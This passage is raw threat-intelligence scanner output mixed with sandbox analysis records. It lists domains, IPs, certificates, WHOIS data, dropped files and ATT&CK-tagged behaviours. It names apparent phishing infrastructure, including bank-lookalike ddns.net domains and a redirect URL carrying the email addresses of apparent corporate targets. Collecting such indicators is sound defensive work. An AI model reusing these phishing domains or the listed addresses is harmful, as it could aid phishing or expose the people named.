/34/items/7164025490-20221107-091147/7164025490_20221107_091147.mp3 HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept: */*\nGetContentFeatures.DLNA.ORG: 1\nPragma: getIfoFileURI.dlna.org\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nHost: ia801500.us.archive.org\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /34/items/7164025490-20221107-091147/7164025490_20221107_091147.mp3 HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept: */*\nGetContentFeatures.DLNA.ORG: 1\nPragma: getIfoFileURI.dlna.org\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nHost: ia801500.us.archive.org\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "OGFMCCVK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OGFMCCVK.txt]- [targetUID: 00000000-00003720]\n Dropped file: "TFIYPCCB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TFIYPCCB.txt]- [targetUID: 00000000-00003720]\n Dropped file: "S5GOY3AO.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S5GOY3AO.txt]- [targetUID: 00000000-00003192]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00003720]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003192]\n "signin_1_.css" has type "ASCII text"- [targetUID: 00000000-00003720]\n "_52898875-9CDE-11ED-967C-080027BEA5A3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003720]\n "~DF942F6CCF20CCC8F3.TMP" has type "data"- Location: [%TEMP%\\~DF942F6CCF20CCC8F3.TMP]- [targetUID: 00000000-00003720]\n 
"_5CEA68F8-9CDE-11ED-967C-080027BEA5A3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003720]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003720]\n "~DF48F06A6EB7E1A5AD.TMP" has type "data"- Location: [%TEMP%\\~DF48F06A6EB7E1A5AD.TMP]- [targetUID: 00000000-00003720]\n "OGFMCCVK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OGFMCCVK.txt]- [targetUID: 00000000-00003720]\n "TFIYPCCB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TFIYPCCB.txt]- [targetUID: 00000000-00003720]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003720]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: 00000000-00003720]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003720]\n "~DF3C3963D5684B734E.TMP" has type "data"- Location: [%TEMP%\\~DF3C3963D5684B734E.TMP]- [targetUID: 00000000-00003720]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003720]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003720]\n "S5GOY3AO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S5GOY3AO.txt]- [targetUID: 00000000-00003192]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003192]\n "RecoveryStore._52898873-9CDE-11ED-967C-080027BEA5A3_.dat" has type 
"Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003720]\n "TarC81A.tmp" has type "data"- Location: [%TEMP%\\TarC81A.tmp]- [targetUID: 00000000-00003192]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human | 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NH-NEW (Net ID: 00:01:21:30:F0:42) | 37.7642, -122.3993 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c57480ebf7f3732-FRA"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 200WMadison (Net ID: 00:01:21:30:9B:1B) | 41.8781, -87.6298 |
| 2023-05-12 02:55:18 | Raw Data from RIRs | No | Censys | 13 | 0 | 3 | 0 | None | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": 
[{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": 
["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", 
"version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} | 46.101.229.70 |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 19:07:08.083 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 13 19:07:08.583 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ply.gg | 185.199.109.153 |
| 2023-05-12 02:59:53 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | nwapi2.battleb0t.xyz |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.io | www.battleb0t.xyz |
| 2023-05-12 02:59:54 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jdenig@generalatlantic.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://generalatlantic.com/astehnkuhl@generalatlantic.com%20https://site.php', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fastehnkuhl%40generalatlantic.com%20https%3A%2F%2Fllink.to%2F%3Fu%3Dhttps%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fjdenig%40generalatlantic.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3f4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_3f4_IE_EarlyTabStart_0xe18_Mutex"\n "IsoScope_3f4_IESQMMUTEX_0_331"\n "IsoScope_3f4_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_3f4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "IsoScope_3f4_ConnHashTable<1012>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.43.150:443"\n "104.21.16.120:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n "142.251.32.35:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." 
(Indicator: "twitter")\n "<a href="https://plus.google.com/107971784894043504000/" onclick="window.open(this.href);return false;"><i class="fa fa-google-plus"></i></a>" (Indicator: "plus.google.com")\n "<a href="https://twitter.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-twitter"></i></a>" (Indicator: "twitter")\n "<a href="https://www.facebook.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-facebook"></i></a>" (Indicator: "facebook.com")\n "<a href="https://www.linkedin.com/company/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-linkedin"></i></a>" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/user/nexcessnet" onclick="window.open(this.href);return false;"><i class="fa fa-youtube"></i></a>" (Indicator: "youtube")\n "<p>Congrats on launching your new Website! Spread the good news: <a href="https://twitter.com/share" class="twitter-share-button" data-text="Just launched my new website with @Nexcess!" 
data-count="none">Tweet</a></p>" (Indicator: "twitter")\n "<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\'://platform.twitter.com/widgets.js\';fjs.parentNode.insertBefore(js,fjs);}}(document, \'script\', \'twitter-wjs\');</script>" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar102F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1041.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab102E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1040.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "GJU2ZIBE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GJU2ZIBE.txt]- [targetUID: 00000000-00001012]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002472]\n "recaptcha__en_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF50FE3D0FF9FC6B92.TMP" has type "data"- Location: [%TEMP%\\~DF50FE3D0FF9FC6B92.TMP]- [targetUID: 00000000-00001012]\n "_5CF2F181-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._52546023-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "site_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "FTU5WTPF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FTU5WTPF.txt]- [targetUID: 00000000-00001012]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. 
All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: N/A]\n "llink_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "_A79A7ACA-C1A9-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "5EL6UQQZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5EL6UQQZ.txt]- [targetUID: 00000000-00002472]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:"!1,w)})},u).prototype.cr=function(){},u.prototype.xy=function(){this.mx.g().focus()},u.prototype.tt=function(w,z,u,r,e,z,y){return(r=((z=new a_((e=["api","payload",(u=void 0===u?"":u,y=["p",0,37],2)],f)[29](y[2],e[y[1]],e[1])+u),z.u).set(y[0],w),wx.y()).get(),z.u.set("k",v[7](16,e[2],r)),z&&z.u.set("id",z),z).tostring()},u).prototype.h1=function(){},u.prototype.ia=function(w,z){(((this.su[(z=["qu",30,"sq"],z)[0]](w),this).mx[z[0]](w),this).rr[z[0]](w),this)[z[2]][z[0]](w),this.bi[z[0]](w),v[z[1]](9," [Source: recaptcha__en_1_.js]\n Observed email 
domain:"z,u){(this[(((((td.prototype.sw[z=["undo-button-holder","image-button-holder","verify-button-holder"],u=["call",1,"sq"],u[0]](this,w),this.su).render(c[41](68,this,"reload-button-holder")),this.mx.render(c[41](52,this,"audio-button-holder")),this.rr).render(c[41](53,this,z[u[1]])),this.bi).render(c[41](84,this,"help-button-holder")),this.xv).render(c[41](68,this,z[0])),f[13](8,!1,this.xv.g()),u)[2]].render(c[41](68,this,z[2])),this).ee?f[13](22,!1,this.mx.g()):f[13](20,!1,this.rr.g())},u).prototype.nu=" [S |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.195): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:54 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 2a06:98c1:3121::1 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | NAMECHEAP INC | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
